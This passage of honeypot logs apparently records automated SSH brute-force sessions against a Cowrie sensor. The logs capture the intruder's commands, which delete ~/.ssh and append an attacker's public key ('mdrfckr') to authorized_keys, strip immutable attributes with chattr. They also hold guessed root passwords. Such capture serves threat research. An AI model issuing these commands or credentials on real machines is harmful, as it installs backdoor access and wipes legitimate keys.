cdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:49:52.050050Z","src_ip":"212.227.235.229","session":"ff9964da8737"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:52.219945Z","src_ip":"212.227.235.229","session":"6fa1d107adbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38270,"dst_ip":"1.2.3.4","dst_port":22,"session":"1128eb323e24","protocol":"ssh","message":"New connection: 212.227.235.229:38270 (1.2.3.4:22) [session: 1128eb323e24]","sensor":"my-vps","timestamp":"2025-09-08T22:49:52.278868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:49:52.279793Z","src_ip":"212.227.235.229","session":"1128eb323e24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:49:52.378687Z","src_ip":"212.227.235.229","session":"1128eb323e24"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:49:52.781637Z","src_ip":"212.227.235.229","session":"6fa1d107adbd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:49:52.782785Z","src_ip":"212.227.235.229","session":"6fa1d107adbd"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei123456","message":"login attempt [root/huawei123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:49:52.811511Z","src_ip":"212.227.235.229","session":"1128eb323e24"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:49:53.061336Z","src_ip":"212.227.235.229","session":"1128eb323e24"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.062208Z","src_ip":"212.227.235.229","session":"1128eb323e24"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.063101Z","src_ip":"212.227.235.229","session":"1128eb323e24"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.064478Z","src_ip":"212.227.235.229","session":"6fa1d107adbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.065292Z","src_ip":"212.227.235.229","session":"6fa1d107adbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.162965Z","src_ip":"212.227.235.229","session":"1128eb323e24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53844,"dst_ip":"1.2.3.4","dst_port":22,"session":"26b3ced8e7e5","protocol":"ssh","message":"New connection: 212.227.235.229:53844 (1.2.3.4:22) [session: 26b3ced8e7e5]","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.324415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.325873Z","src_ip":"212.227.235.229","session":"26b3ced8e7e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:49:53.427979Z","src_ip":"212.227.235.229","session":"1128eb323e24"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.428739Z","src_ip":"212.227.235.229","session":"1128eb323e24"}
{"eventid":"cowrie.login.failed","username":"apps","password":"apps123","message":"login attempt [apps/apps123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.472398Z","src_ip":"212.227.235.229","session":"ff9964da8737"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.528747Z","src_ip":"212.227.235.229","session":"1128eb323e24"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.529747Z","src_ip":"212.227.235.229","session":"1128eb323e24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.597448Z","src_ip":"212.227.235.229","session":"26b3ced8e7e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38278,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a7c4fc5c157","protocol":"ssh","message":"New connection: 212.227.235.229:38278 (1.2.3.4:22) [session: 8a7c4fc5c157]","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.627587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.628615Z","src_ip":"212.227.235.229","session":"8a7c4fc5c157"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:49:53.727190Z","src_ip":"212.227.235.229","session":"8a7c4fc5c157"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:49:54.164904Z","src_ip":"212.227.235.229","session":"8a7c4fc5c157"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:49:54.723854Z","src_ip":"212.227.235.229","session":"26b3ced8e7e5"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:54.817610Z","src_ip":"212.227.235.229","session":"ff9964da8737"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:55.265872Z","src_ip":"212.227.235.229","session":"8a7c4fc5c157"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38290,"dst_ip":"1.2.3.4","dst_port":22,"session":"070705c6ee69","protocol":"ssh","message":"New connection: 212.227.235.229:38290 (1.2.3.4:22) [session: 070705c6ee69]","sensor":"my-vps","timestamp":"2025-09-08T22:49:55.364124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:49:55.364747Z","src_ip":"212.227.235.229","session":"070705c6ee69"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:49:55.463844Z","src_ip":"212.227.235.229","session":"070705c6ee69"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:49:55.901441Z","src_ip":"212.227.235.229","session":"070705c6ee69"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:55.996539Z","src_ip":"212.227.235.229","session":"26b3ced8e7e5"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:56.002931Z","src_ip":"212.227.235.229","session":"1128eb323e24"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:56.003690Z","src_ip":"212.227.235.229","session":"070705c6ee69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37542,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f8574c011fa","protocol":"ssh","message":"New connection: 212.227.235.229:37542 (1.2.3.4:22) [session: 0f8574c011fa]","sensor":"my-vps","timestamp":"2025-09-08T22:50:10.260759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:50:10.286225Z","src_ip":"212.227.235.229","session":"0f8574c011fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:50:10.539561Z","src_ip":"212.227.235.229","session":"0f8574c011fa"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc123","message":"login attempt [testuser/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:50:11.542120Z","src_ip":"212.227.235.229","session":"0f8574c011fa"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:50:12.766603Z","src_ip":"212.227.235.229","session":"0f8574c011fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54190,"dst_ip":"1.2.3.4","dst_port":23,"session":"942c3b68ec57","protocol":"telnet","message":"New connection: 212.227.235.229:54190 (1.2.3.4:23) [session: 942c3b68ec57]","sensor":"my-vps","timestamp":"2025-09-08T22:50:15.439090Z"}
{"eventid":"cowrie.session.closed","duration":37.65921711921692,"message":"Connection lost after 37 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:50:53.098238Z","src_ip":"212.227.235.229","session":"942c3b68ec57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58060,"dst_ip":"1.2.3.4","dst_port":22,"session":"50b17cefc013","protocol":"ssh","message":"New connection: 212.227.235.229:58060 (1.2.3.4:22) [session: 50b17cefc013]","sensor":"my-vps","timestamp":"2025-09-08T22:50:58.779917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:50:58.780825Z","src_ip":"212.227.235.229","session":"50b17cefc013"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35800,"dst_ip":"1.2.3.4","dst_port":22,"session":"78bd41692b2a","protocol":"ssh","message":"New connection: 212.227.235.229:35800 (1.2.3.4:22) [session: 78bd41692b2a]","sensor":"my-vps","timestamp":"2025-09-08T22:50:58.908615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:50:58.909580Z","src_ip":"212.227.235.229","session":"78bd41692b2a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:50:59.012906Z","src_ip":"212.227.235.229","session":"50b17cefc013"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:50:59.220479Z","src_ip":"212.227.235.229","session":"78bd41692b2a"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer@1234","message":"login attempt [root/Qwer@1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:50:59.944097Z","src_ip":"212.227.235.229","session":"50b17cefc013"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:51:00.431046Z","src_ip":"212.227.235.229","session":"50b17cefc013"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:51:00.431818Z","src_ip":"212.227.235.229","session":"50b17cefc013"}
